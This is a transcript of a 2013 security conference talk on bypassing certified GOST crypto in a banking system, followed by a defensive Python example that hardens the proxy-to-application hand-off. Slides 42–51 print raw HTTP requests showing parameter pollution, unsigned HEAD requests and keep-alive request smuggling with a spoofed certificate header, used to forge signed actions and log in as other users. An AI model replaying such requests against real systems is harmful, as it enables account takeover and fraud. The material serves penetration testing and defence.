You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
Our talk from Hack in the Box Amsterdam 2013.
It’s no surprise that a typical hacker’s professional path runs into custom crypto protocols from time to time. There are lots of application-specific, crypto-hardened protocols written from scratch in banking, SCADA, and other not-so-common hardware and software systems. In this presentation we propose a methodology for breaking into such systems using a top-down approach, with GOST-hardened banking applications as the example. We show how easy it is to bypass complex crypto protections when developers have an inconsistent understanding of modern application-level protocols.

Transcript

  • 1. You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps. Andrew Petukhov (Founder/CTO, Solidlab), George Noseevich (PhD student, MSU), Dennis Gamayunov (Acting Head, Information Systems Security Lab, MSU)
  • 2. And along comes… INTRO
  • 3. Part One. “There was me, that is Dennis, and my two droogs, that is Georgie and Andrew, and we sat in the lab making up our rassoodocks what to do with the Big Bank’s RBS, a GOST crypto hardened bastard though rare.”
  • 4. What we see
    – An RBS which uses crypto for non-repudiation, authenticity and protocol security
    – The RBS complies with Russian Central Bank regulations
    – …unbreakable :-(
  • 5. What’s it going to be then, eh? (image slide)
  • 6. What comes with UltraViolence
    – Bypass non-repudiation (force the RBS to process non-signed requests)
    – Bypass the second authentication layer (enforced with crypto)
    – Which finally allowed logging into the RBS as any valid user and filing any request to the RBS
  • 7. And along comes… SYSTEM UNDER ASSESSMENT
  • 8. Target application type (1/3). We aim at pentesting financial organizations who try to:
    – Ensure transport layer security, non-repudiation and authentication
    – Comply with regulations
    – Protect legacy systems
  • 9. Target application type (2/3)
    – Technical best practices: confidentiality, authenticity, non-repudiation
    – Compliance: use of certified crypto
    – Business needs: in-house vs outsourced; solid vs modular; the customer does not simply develop his own certified crypto; outsourcing app development to certified crypto writers – never a good idea
  • 10. Target application type (3/3). Solution: crypto-hardened thick client + server-side application-specific crypto proxy
  • 11. Seeding the arch. Business logic over HTTP. Client side: Browser. Server side: RBS Application Server.
  • 12. Let’s add some REQs. Req++: Transport security & certified crypto. Client side: Browser → Tunnel endpoint. Server side: Crypto server (powered by a certified crypto provider, terminates the tunnel) → RBS Application Server.
  • 13. A little bit more… Req++: Authenticity & non-repudiation.
    – Client side: Browser → Tunnel endpoint (signs the ingress request, puts everything into custom headers)
    – Server side: Crypto server (verifies the signature; if OK, logs for non-repudiation and passes upstream) → RBS Application Server (trusts the custom headers; matches the id from the session with the id from the header)
  • 14. And along comes… METHODOLOGY
  • 15. Common sense suggests
    – One doesn’t simply implement an application-level crypto protocol
    – One doesn’t simply implement an HTTP client or server from scratch
    – Many parsers in a row suggest inconsistencies => possibility for smuggling
  • 16. Objective
    – Objective: find differences in HTTP handling at the crypto server side and at the application server side
    – Exploit: use the differences to bypass signature validation
  • 17. Basic steps for reversing the arch
    – Reverse client-side features
    – Survey server-side features
    – Fingerprint the integration protocol
  • 18. Dealing with client-side crypto
    – Which HTTP client and which HTTP parser are used? (e.g. Windows API or Java HttpClient)
    – What parts of the HTTP request are being signed? (in POST? in GET? in HEAD? in TRACE?)
    – What additional metadata is attached to requests? (how is the signature stored? how is the key ID passed to the server?)
  • 19. Because nothing ever changes…
    – XML Signature Wrapping – another kind of “You can be anything you want to be” (www.youtube.com/watch?v=RHIkb9yEV1k); “Analysis of Signature Wrapping Attacks and Countermeasures”
    – CWE-347: Improper Verification of Cryptographic Signature, and related CVEs
    – Web App Cryptology: A Study in Failure
    – Now and then: insecure random numbers
    – Now and then: improper PKI implementation
  • 20. Fingerprinting HTTP parsers
    – HTTP parameter pollution: the same parameter in query or body; the same parameter in query and body
    – Duplicate headers: control headers with metadata; Content-Length header
    – HTTP parameter contamination: which characters are valid for terminating header values?
  • 21. Fingerprinting the WWW server
    – Which HTTP version is supported? Does the crypto server support multiple HTTP requests per connection? Does it support HTTP/0.9?
    – How does the crypto server treat incorrect or duplicate Content-Length headers?
    – Which HTTP methods does it support?
    – Does the crypto server support multipart requests or chunked encoding?
  • 22. Because nothing ever changes…
    – Google for <HPP bypass WAF>
    – CWE-444: Inconsistent Interpretation of HTTP Requests, and all the CVE instances related to CWE-444
  • 23. Fingerprinting the integration protocol
    – How does the crypto server communicate validation status and metadata to the application server? Metadata is relayed as submitted by the client, in a yet unknown part of the request.
    – How to get into that part? HTTP TRACE method / debug interface in the web application / guess / brute-force / read the documentation / ask the developers (aka social engineering)
  • 24. And along comes… CASE STUDY
  • 25. It all started as an ordinary hack
    – Test our shiny RBS web app, they said
    – It comes with a certified crypto protection, they said
    – Instantly found some common web app bugs
  • 26. …then the crypto came into play
    – Crypto ensures non-repudiation: your crypto-signed attack vectors will be used against you in court
    – Crypto ensures authenticity: session hijacking is essentially useless; can’t log in as another user without his keys
    – This greatly reduces severity
  • 27. Reversing the client
    – Closed-source Windows app
    – Traffic dump gives no clues
    – The protocol is custom, no docs available
    – No time for long IDA sessions
    – Seems tough :(
  • 28. Reversing the client: the lazy way
    – The client uses crypto primitives from bundled shared libs
    – Library call hooks and API call traces FTW!
    – Filter the traces to get data that is easy to understand
    – API Monitor (bit.ly/37BTzf)
  • 29–38. API call trace (screenshot slides). Captions, in order: Encrypt user data; What is being encrypted? (three slides); What is being signed?; Send it through the tunnel; Receive encrypted response; Decrypt the response; Send it back to browser.
  • 39. So it comes like this. Req++: Authenticity & non-repudiation. The request as the browser sends it to the tunnel endpoint:
    GET /login?name=value HTTP/1.1
    Host: 10.6.28.19
  • 40. And is secured like this. The same request after the tunnel endpoint has signed it:
    GET /login?name=value HTTP/1.1
    Host: 10.6.28.19
    Certificate_number: 0x849
    Form_data: name=value
    Signature: 6B8A57A3EA9C25D77C01F4E957D5752C69F61D3451E87DD18046C51DC9A9AD63C7718708159B7ECF5FC8EDF4424F813DB65EF5E2D21D2F389E03319CA25D7003
  • 41. Further notices
    – The proxy signs the query string for GET and the message body for POST
    – The server actually checks that Form_data reflects the query string/body
    – The server checks the Cert_num and the signature
    – The web app checks that cert_num matches the current user
    – Kinda unbreakable, heh?
  • 42. Non-repudiation, take one. Bypass non-repudiation. The request as sent by the browser:
    HEAD /bank/welcome?name=value HTTP/1.1
    Host: 10.6.28.19
  • 43. Non-repudiation, take one. The same request after the tunnel endpoint (only the certificate number is added; no Form_data and no Signature):
    HEAD /bank/welcome?name=value HTTP/1.1
    Host: 10.6.28.19
    Certificate_number: 0x849
  • 44. Non-repudiation, take two. Bypass non-repudiation. The request as sent by the browser:
    POST /bank/welcome?name=value1 HTTP/1.1
    Host: 10.6.28.19
    Content-Length: 15

    name=value2
  • 45. Non-repudiation, take two. The same request after the tunnel endpoint (Form_data and the signature cover the body, not the query string):
    POST /bank/welcome?name=value1 HTTP/1.1
    Host: 10.6.28.19
    Content-Length: 15
    Certificate_number: 0x849
    Form_data: name=value2
    Signature: 3195E979E107731A2572197AB9D8BC01CE2C7EE0C42B97A02393F1263C23E25D2D21E7AA7CB07114491A72750C2EFD1AEEAEB357C874BFB3100336F5BD01C00C

    name=value2
  • 46. Non-repudiation, take two – Exploit (!!!)
    POST /bank/welcome?name=attack-value HTTP/1.1
    Host: 10.6.28.19
    Content-Length: 15
    Certificate_number: 0x849
    Form_data: name=common-value
    Signature: 3195E979E107731A2572197AB9D8BC01CE2C7EE0C42B97A02393F1263C23E25D2D21E7AA7CB07114491A72750C2EFD1AEEAEB357C874BFB3100336F5BD01C00C

    name=common-value
  • 47. So what? In Soviet Russia, who cares about repudiation?
  • 48. Authentication: log in as any other user. Bypass crypto authentication:
    POST http://10.6.28.19/login HTTP/1.1
    Host: 10.6.28.19
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    Certificate_number: 0x717

    sName=772965163660&sPass=valid.60
  • 49. Authentication: crypto id and session id do not match (diagram slide)
  • 50. Authentication: But… Two requests on one keep-alive connection, as sent by the browser:
    HEAD http://10.6.28.19/login?sName=772865163421&sPass=valid.21 HTTP/1.1
    Host: 10.6.28.19
    Connection: keep-alive
    Content-Length: 10

    p=nonemptybody
    POST http://10.6.28.19/login HTTP/1.1
    Host: 10.6.28.19
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    Certificate_number: 0x717

    sName=772965163660&sPass=valid.60
  • 51. Authentication: But… The same bytes after the tunnel endpoint: the crypto server treats them as one HEAD request and adds its own Certificate_number: 0x849 to it, while the POST that follows reaches the application server with the client-supplied Certificate_number: 0x717:
    HEAD http://10.6.28.19/login?sName=772865163421&sPass=valid.21 HTTP/1.1
    Host: 10.6.28.19
    Connection: keep-alive
    Content-Length: 10
    Certificate_number: 0x849

    p=nonemptybody
    POST http://10.6.28.19/login HTTP/1.1
    Host: 10.6.28.19
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    Certificate_number: 0x717

    sName=772965163660&sPass=valid.60
  • 52. And along comes… WRAP UP
  • 53. At first I was like… How a typical pentester sees a custom crypto protocol (image slide)
  • 54. But then… It looks more intriguing (image slide)
  • 55. No surprise. “I definitely believe that cryptography is becoming less important. In effect, even the most secure computer systems in the most isolated locations have been penetrated over the last couple of years by a series of APTs and other advanced attacks,” Shamir said during the Cryptographers’ Panel session at the RSA Conference 2013.
  • 56. Violent curiosity leads to… …successful bypass
  • 57. Contacts. George Noseevich, @webpentest, webpentest@bushwhackers.ru. Andrew Petukhov, @p3tand, andrew.petukhov@solidlab.ru. Dennis Gamayunov, @jamadharma, gamajun@seclab.cs.msu.su.
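The slides on fingerprinting the parsers (20–23) and the three bypasses in the case study (41–51) all come down to the same two design errors: the crypto server signs only part of the request (query string for GET, body for POST, nothing for HEAD), and the application server trusts whatever arrives in the Certificate_number header without being able to tell whether the crypto server actually put it there. The following is an added example, not code from the talk or from the assessed product, showing how a proxy/application hand-off can be hardened against exactly those mismatches. HMAC-SHA256 with a secret shared between the two servers stands in for the certified GOST signature (assumption); the X-Proxy-MAC header name and PROXY_SECRET are constructed for the example; the header names Certificate_number, Form_data and Signature, the certificate numbers 0x849 and 0x717 and the host 10.6.28.19 are taken from the slides. The demo() walk-through replays the deck's own requests against the checks.

```python
import hashlib
import hmac

# Headers the crypto server owns (names from the slides plus the constructed
# X-Proxy-MAC): a copy supplied by the client is discarded, never forwarded.
TRUST_HEADERS = {"certificate_number", "form_data", "signature", "x-proxy-mac"}

# Constructed secret shared by the crypto server and the application server
# (assumption: a real deployment loads it from a key store, not a literal).
PROXY_SECRET = b"constructed-shared-secret-for-the-example-only"


def canonical_request(method, path, query, body):
    """Serialize every part the application acts on. Because the method, the
    query string and the body are all covered, the slide 44-46 trick (signed
    body, unsigned query) and the slide 42-43 trick (unsigned HEAD) both fail."""
    body_hash = hashlib.sha256(body).hexdigest()
    return "\n".join([method.upper(), path, query, body_hash]).encode()


def framing_is_unambiguous(method, headers):
    """Refuse requests that two HTTP parsers could frame differently (CWE-444):
    duplicate Content-Length, Content-Length next to Transfer-Encoding, or a
    body on a GET/HEAD request as in the slide 50-51 keep-alive pair."""
    names = [k.lower() for k, _ in headers]
    lengths = [v.strip() for k, v in headers if k.lower() == "content-length"]
    if len(lengths) > 1:
        return False
    if "transfer-encoding" in names and lengths:
        return False
    if method.upper() in ("GET", "HEAD") and lengths and lengths[0] != "0":
        return False
    return True


def strip_client_trust_headers(headers):
    """Drop any trust header the client tried to set before the proxy adds its own."""
    return [(k, v) for k, v in headers if k.lower() not in TRUST_HEADERS]


def proxy_mac(cert_number, canonical):
    """HMAC-SHA256 stands in for the certified signature on the proxy->app hop."""
    return hmac.new(PROXY_SECRET, cert_number.encode() + b"\n" + canonical,
                    hashlib.sha256).hexdigest()


def crypto_server_forward(method, path, query, body, client_headers,
                          cert_number, client_signature_ok):
    """Crypto server side. client_signature_ok stands for the outcome of the
    client-key signature check, which is out of scope here. Returns the header
    list sent upstream, or None when the request is refused."""
    if not client_signature_ok or not framing_is_unambiguous(method, client_headers):
        return None
    upstream = strip_client_trust_headers(client_headers)
    mac = proxy_mac(cert_number, canonical_request(method, path, query, body))
    upstream += [("Certificate_number", cert_number), ("X-Proxy-MAC", mac)]
    return upstream


def app_server_accept(method, path, query, body, headers, session_cert):
    """Application side. The canonical form is recomputed from what the
    application itself parsed, so any proxy/app disagreement fails the MAC;
    only then is the certificate number compared with the session owner."""
    lookup = {}
    for k, v in headers:
        name = k.lower()
        if name in TRUST_HEADERS and name in lookup:
            return False  # duplicated trust header: treat as hostile
        lookup[name] = v
    cert = lookup.get("certificate_number")
    mac = lookup.get("x-proxy-mac")
    if cert is None or mac is None:
        return False
    expected = proxy_mac(cert, canonical_request(method, path, query, body))
    if not hmac.compare_digest(expected, mac):
        return False
    return cert == session_cert


def demo():
    """Constructed walk-through: an honest request, then the deck's tricks,
    each stopped by a specific check. Returns (ok, hpp, spoof, smuggle)."""
    body = b"name=common-value"
    honest = crypto_server_forward("POST", "/bank/welcome", "name=common-value", body,
                                   [("Host", "10.6.28.19")], "0x849", True)
    ok = app_server_accept("POST", "/bank/welcome", "name=common-value", body, honest, "0x849")
    # Query string differs from what the proxy covered: the MAC no longer matches.
    hpp = app_server_accept("POST", "/bank/welcome", "name=attack-value", body, honest, "0x849")
    # Client pre-sets the victim's certificate number: the header is stripped.
    injected = crypto_server_forward("POST", "/login", "", b"sName=x&sPass=y",
                                     [("Host", "10.6.28.19"), ("Certificate_number", "0x717")],
                                     "0x849", True)
    spoof = app_server_accept("POST", "/login", "", b"sName=x&sPass=y", injected, "0x717")
    # HEAD carrying a body: refused before anything is signed or forwarded.
    smuggle = crypto_server_forward("HEAD", "/login", "sName=x&sPass=y", b"p=nonemptybody",
                                    [("Host", "10.6.28.19"), ("Connection", "keep-alive"),
                                     ("Content-Length", "10")], "0x849", True)
    return ok, hpp, spoof, smuggle


if __name__ == "__main__":
    print(demo())  # (True, False, False, None)
```

The two design choices worth noting: the application server never decides trust from a header value alone, it recomputes the canonical request from its own parse and checks the proxy's MAC over it, so the two parsers are forced to agree before the certificate number is even looked at; and framing that is ambiguous between parsers is rejected at the first hop rather than left for the last one to interpret.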